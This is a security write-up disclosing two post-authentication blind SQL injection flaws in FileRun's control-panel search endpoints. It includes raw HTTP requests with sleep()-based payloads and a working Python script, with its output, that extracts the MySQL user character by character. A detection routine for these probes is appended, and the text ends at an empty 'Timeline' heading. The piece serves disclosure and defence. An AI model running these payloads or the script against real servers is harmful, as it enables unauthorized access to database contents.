Blind SQL Injection Vulnerability in FileRun<=2017.09.25

0x00 Preface

For internal file sharing we needed a private cloud-drive service, and after some searching I found that FileRun is a good fit. FileRun lets us self-host secure cloud storage, so photos, videos and other files can be stored and shared from anywhere.


0x01 Finding the Vulnerabilities

Both vulnerabilities are post-authentication: they were found after logging in to the control panel as superuser.

SQL1

Go to Control Panel——>Admin——>Users——>quick search. This sends a POST request to the server:


POST /?module=users&section=cpanel&page=list HTTP/1.1
Host: target.com
Content-Length: 20
Origin: http://target.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://target.com/?module=cpanel&_popup_id=popups_1
Accept-Language: zh-CN,zh;q=0.9
Cookie: __cfduid=d7455062d8788785c8b64d8dfef5a7f041513411013; language=chinese; FileRunSID=e578cd49697ef564ed0979bde9d67dcf
Connection: close

limit=50&search=aaaa

I noticed that the search parameter might be vulnerable to SQL injection. Appending a single quote to the value (aaaa') made the server return a 500 response:

userlist.png

I then built a time-based payload using MySQL's sleep() delay function:

'xor(sleep(5))or'

The result:

sleeptime.png

I then used boolean-based blind SQL injection to retrieve the result of select user(). The verification script is as follows:


#!/usr/bin/env python3
# -*- coding:utf-8 -*-
#__author__ = 'scanf'
import http.client
import time

# Session cookies of the logged-in superuser (replace with your own).
headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',
           'Cookie': '__cfduid=d7455062d8788785c8b64d8dfef5a7f041513411013; language=chinese; FileRunSID=e578cd49697ef564ed0979bde9d67dcf',
           #'Cookie' : 'input your cookie',
           }
# Candidate characters tried for each position of the user() result.
payloads = '[email protected]_.*'
print('[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime()))
user = ''
for i in range(1, 15):              # position within the user() string
    for payload in payloads:
        # Boolean condition: is the character at position i equal to this candidate?
        s = "aaaa'xor(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))or'" % (i, ord(payload))
        s = 'limit=50&search=' + s
        # url = http://target.com/?module=users&section=cpanel&page=list
        conn = http.client.HTTPConnection('target.com', timeout=30)
        conn.request(method='POST', url='/?module=users&section=cpanel&page=list', body=s, headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8', 'replace')
        conn.close()
        print('.', end=' ', flush=True)
        # A true condition returns the user list (which contains 'uid'); a false one returns nothing.
        if html_doc.find('uid') > 0:
            user += payload
            print('\n[in progress]', user, end=' ')
            break
print('\n[Done] MySQL user is %s' % user)

[20:39:20] Start to retrive MySQL User:
. . . . . . 
[in progress] f . . . . . . . . . 
[in progress] fi . . . . . . . . . . . . 
[in progress] fil . . . . . 
[in progress] file . . . . . . . . . . . . . . . . . . 
[in progress] filer . . . . . . . . . . . . . . . . . . . . . 
[in progress] fileru . . . . . . . . . . . . . . 
[in progress] filerun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[in progress] [email protected] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[in progress] [email protected] . . .

SQL2

Control Panel——>Metadata——>quick search: entering a string sends a POST request to the server, just as in SQL1:


POST /?module=metadata&section=cpanel&page=list_filetypes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target.com/?module=cpanel&_popup_id=popups_1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 36
Cookie: __cfduid=df5ddd49a2303cb2e13b6aa8ece2af7b11513411363; FileRunSID=fa163cd088b68ae20c689826e3a70479; language=chinese
Connection: close

limit=50&search=aaa'xor(sleep(2))or'

The response is delayed, showing that the sleep() function is executed:

time.png
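As an added example that is not part of this writeup, the following Python detection logic checks request-log entries for the signatures of the probes shown above: a lone quote in the search parameter that produces a 500, MySQL functions such as sleep() or ascii(mid(user()...)) in the search term, and a response time that tracks the sleep() argument. The log entries are constructed to mirror the two control-panel requests in this post; the 2-second slow threshold and the field layout are assumptions.

```python
import re
import urllib.parse

# Constructed request-log entries modelled on the requests in this writeup:
# (method, path, POST body, response status, response time in seconds).
SAMPLE_LOG = [
    ("POST", "/?module=users&section=cpanel&page=list",
     "limit=50&search=aaaa", 200, 0.12),
    ("POST", "/?module=users&section=cpanel&page=list",
     "limit=50&search=aaaa%27", 500, 0.09),
    ("POST", "/?module=users&section=cpanel&page=list",
     "limit=50&search=aaaa%27xor%28sleep%285%29%29or%27", 200, 5.21),
    ("POST", "/?module=metadata&section=cpanel&page=list_filetypes",
     "limit=50&search=aaa%27xor%28sleep%282%29%29or%27", 200, 2.30),
    ("POST", "/?module=users&section=cpanel&page=list",
     "limit=50&search=aaaa%27xor%28if%28ascii%28mid%28user%28%29from%281%29for%281%29%29%29%3D102%2C1%2C0%29%29or%27",
     200, 0.11),
    ("POST", "/?module=users&section=cpanel&page=list",
     "limit=50&search=O%27Brien", 200, 0.10),   # legitimate apostrophe, must not be flagged
]

# MySQL functions that have no place in a user-list or file-type search term.
SUSPICIOUS = re.compile(r"\b(sleep|benchmark|if|ascii|mid|substr(ing)?|user|version)\s*\(", re.I)


def classify(body, status, seconds, slow_threshold=2.0):
    """Return the reasons a single cpanel search request looks like an injection probe."""
    search = urllib.parse.parse_qs(body, keep_blank_values=True).get("search", [""])[0]
    reasons = []
    if SUSPICIOUS.search(search):
        reasons.append("sql-function-in-search")
        if seconds >= slow_threshold:
            reasons.append("time-based")      # delay consistent with a sleep()/benchmark() payload
    elif search.count("'") % 2 == 1 and status == 500:
        reasons.append("quote-probe-500")     # the error the writeup observed for aaaa'
    return reasons


def flag_entries(log, slow_threshold=2.0):
    """Return (module, reasons) for every flagged POST to a control-panel search endpoint."""
    flagged = []
    for method, path, body, status, seconds in log:
        if method != "POST" or "section=cpanel" not in path:
            continue
        reasons = classify(body, status, seconds, slow_threshold)
        if reasons:
            flagged.append((path.split("&")[0], reasons))
    return flagged
```

The plain 500 on aaaa' is flagged only when the quote is unbalanced, so an ordinary search such as O'Brien that the application handles correctly is not reported.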

Timeline
